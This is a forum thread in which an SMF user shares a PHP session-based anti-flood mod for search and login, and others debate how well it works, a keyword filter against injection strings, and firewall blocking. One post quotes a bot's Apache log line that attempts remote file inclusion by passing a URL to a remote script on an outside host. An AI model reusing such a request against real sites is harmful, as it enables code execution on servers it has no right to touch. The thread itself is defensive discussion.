AntiSqlFlood by kike [SECURITY]

Started by pixelsdream, December 18, 2007, 09:42:38 AM


pixelsdream

Hi, I want to share with all of you one of my new modifications for SMF 1.1.4. It's a protection against SQL flood attacks.


First create a new document called

antisqlflood.php

Second copy and paste this code


<?php
//AntiSqlFlood by kike([email protected])
//www.pixelsdream.com
//This work is licensed under a Creative Commons license (http://creativecommons.org/licenses/by-nc-sa/2.5/es/)
session_start();
$tiempoespera = 30;               // seconds a client must wait between guarded actions
$session = "sqlfloodprotection";  // session key holding the time of the last guarded action
// Block the request if the last guarded action in this session was less than $tiempoespera seconds ago
if (isset($_SESSION[$session]) && ($_SESSION[$session] >= time() - $tiempoespera))
{
	exit(
"<center><img src='http://www.pixelsdream.com/antiflood.jpg' width='234' height='234' alt='antisqlflood by kike'/><b>Please, wait 30 seconds for made another query or action</b><br><b>Por favor, espera 30 segundos para realizar otra consulta o accion</b></br>Press <b><a href='index.php'>here</a></b> for return to index<br>Pulsa <b><a href='index.php'>aqui</a></b> para volver al indice<br><br><br>Sql Flood Protection for smf by Kike([email protected])<br>Developed by www.pixelsdream.com<br>Desarrollado por www.pixelsdream.com
<br>
<br>
<br>
 <a rel='license' href='http://creativecommons.org/licenses/by-nc-sa/2.5/es/'>
<img alt='Creative Commons License' style='border-width:0' src='http://creativecommons.org/images/public/somerights20.png' />
</a>
 </center>"
	);
	return false; // never reached: exit() has already ended the request
}
// Record the time of this action; the next guarded action is allowed after $tiempoespera seconds
$_SESSION[$session] = time();
//AntiSqlFlood by kike([email protected])
//www.pixelsdream.com
//This work is licensed under a Creative Commons license (http://creativecommons.org/licenses/by-nc-sa/2.5/es/)
?>


Next you need to protect all of the actions from index.php.

find this line...

global $modSettings, $settings, $user_info, $board, $topic, $maintenance, $sourcedir;

and add this before it:

//antidos protection by kike ([email protected])
// The parentheses are needed: && binds tighter than ||, so without them the
// second comparison runs even when no 'action' parameter was sent at all.
if (isset($_GET['action']) && ($_GET['action'] == 'search' || $_GET['action'] == 'search2'))
{
	include 'antisqlflood.php';
}
if (isset($_GET['action']) && ($_GET['action'] == 'login' || $_GET['action'] == 'login2'))
{
	include 'antisqlflood.php';
}


That's all. Thanks for your attention and enjoy this modification.

karlbenson

Nice, but you might want to change the image link to your own.

Especially since
a) the first link is a warez site
b) the site is suspended by the ISP (no doubt for a)).

pixelsdream

Thanks karlbenson for the report. I changed the image; this works well.

P.S. Some SQL flooders don't support cookies, and sessions use cookies; one good idea is to make a connection to MySQL to save all the times and IPs. If anyone wants this latest modification they can send me a mail ([email protected]) and I can share my latest code.

P.S. 2: karlbenson, the site is suspended for abusive use of the server (SQL flood attack). Somebody attacked my site and I made this script to prevent new attacks.
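As an added example (not code from this thread or from the mod), here is the server-side variant pixelsdream suggests in the P.S.: the "last request" time is keyed on the client IP and kept in a table instead of the PHP session, so a client that never sends the session cookie is still throttled. It keeps the mod's single 30-second window shared across the guarded actions and is written in Python with an in-memory SQLite table standing in for the MySQL table; the table name, function names and the sample IPs are assumptions.

```python
import sqlite3
import time

# Same 30-second window as $tiempoespera in antisqlflood.php
WAIT_SECONDS = 30
# Same actions the index.php hook sends through antisqlflood.php
GUARDED_ACTIONS = {"search", "search2", "login", "login2"}

# Constructed stand-in for the MySQL "times and IPs" table (assumed name/schema):
# one row per client IP holding the last guarded action and its timestamp.
SCHEMA = """CREATE TABLE IF NOT EXISTS flood_guard (
    ip TEXT PRIMARY KEY, action TEXT NOT NULL, last INTEGER NOT NULL)"""


def open_store(path=":memory:"):
    """Open the store; ':memory:' keeps the example self-contained."""
    conn = sqlite3.connect(path)
    conn.execute(SCHEMA)
    return conn


def allowed(conn, ip, action, now=None):
    """Return True if the request may run, False if the client must wait.

    The state lives on the server, keyed on the client IP, so a client that
    discards the session cookie is still throttled. As in the mod, a blocked
    request does not extend the window.
    """
    if action not in GUARDED_ACTIONS:
        return True
    now = int(time.time()) if now is None else int(now)
    row = conn.execute("SELECT last FROM flood_guard WHERE ip = ?", (ip,)).fetchone()
    if row is not None and row[0] >= now - WAIT_SECONDS:
        return False
    conn.execute("INSERT OR REPLACE INTO flood_guard (ip, action, last) VALUES (?, ?, ?)",
                 (ip, action, now))
    conn.commit()
    return True


def purge(conn, now=None):
    """Drop rows whose window has expired; returns how many were removed."""
    now = int(time.time()) if now is None else int(now)
    cur = conn.execute("DELETE FROM flood_guard WHERE last < ?", (now - WAIT_SECONDS,))
    conn.commit()
    return cur.rowcount
```

A per-IP window only closes the cookie gap; as karlbenson points out further down, requests spread over many addresses still have to be handled at the firewall.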

rummie

No offense, but the code is stupid and a waste of time; it also cannot do what it claims.


pixelsdream

Have you tried the code? For my forum it is very useful, adding just some lines :D
Haven't you tried an SQL flood attack??

rummie

Ok... just read it... it's rubbish.

E107 has some good anti-flood code; download and study that, then return.

pixelsdream

You haven't got any idea of what SQL attacks I'm talking about... ¬¬
In my forum it works perfectly; you can test it. What's your forum, so I can check your mega-hyper-protection? xD
Your replies are the only rubbish in this post...
I have been studying PHP and MySQL for 5 years; do you want to teach me today? Don't make me laugh, please...
If you want to and you know PHP and MySQL, modify my script and replace sessions (cookies) with MySQL queries, and this script can be the best protection against SQL attacks :)

P.S. About the E107 anti-flood code, I don't know it; can you tell me the URL of this project, please?

rummie

Yes, you are right and I am wrong.
Forgive me for doubting you, oh master!

(LMAO)

Dragooon

@rummie: Your attitude wasn't appreciated and no one is interested in your stupid replies.
If you have a reason why it is stupid, tell us.

And if I get this right, this is to prevent spamming SQL queries. And this is for SMF, NOT E107.

Marook

Looks interesting, but can you explain the code? In your antisqlflood.php you're testing the session var sqlfloodprotection, but when will this var be set?
SMF Rulez ;) | Meet me home ! | My Mods

Marook

I will download E107 and check the flood protection. I've also written an 'antihacker' script, because every day hundreds of script kiddies want to find any security leaks and try to execute their bots on my site. ATM I'm checking every GET request, removing possible attack strings like SELECT, SCRIPT ... and comparing the original GET with the replaced one. If it's the same, everything went right. Otherwise you will get an error and be banned by .htaccess for 60 mins. What do you think about it? Is there any other way to figure out a possible hack attack?

karlbenson

If people are running bots, it's not too difficult to run the requests through a series of proxies.

Thus nullifying this script entirely.

I can think of a dozen ways to easily overload a forum, although for obvious reasons I wouldn't post them here.

Marook

Would you like to try it at my website? I could check the log files and maybe I can improve the script...

karlbenson

I wouldn't bother. It would be a waste of time, just think about it.

You're thinking that attacks come from 1 person.
When in fact it could be 10, or even a small botnet could amount to 100's.

Marook

Yes, you're right, but in the past there were almost only single script kiddies who wanted to inject some code. When a small botnet is attacking my site, all IPs get banned after the first try. This script works fine ATM, but I just want to improve it to avoid the daily script-kiddie Perl-script code injection ;)

karlbenson

I've never had a need for anything like this with smf.

At the end of the day the ONLY way to counter a ddos attack is by server firewalls and ip blocking.

Marook


*********.net - - [18/Dec/2007:10:37:42 +0100] "GET /smf/index.php?x=http://dd3str0y3r.vilabol.uol.com.br/sk4n/safeon.txt?? HTTP/1.1" 302 353 "-" "libwww-perl/5.79"


This kind of request fills up my Apache log every day... and I just want a solution for all those who, like me, don't have a virtual or dedicated server. I just have webspace and can't install a firewall, but I'm still searching for a way to prevent code injections.

karlbenson

But that's not going to do anything to SMF.

Actions are sanitized, escaped, preg_matched, validated, etc.

All you'll get there is an entry in your log, when in fact that user would simply have been redirected to the board index.
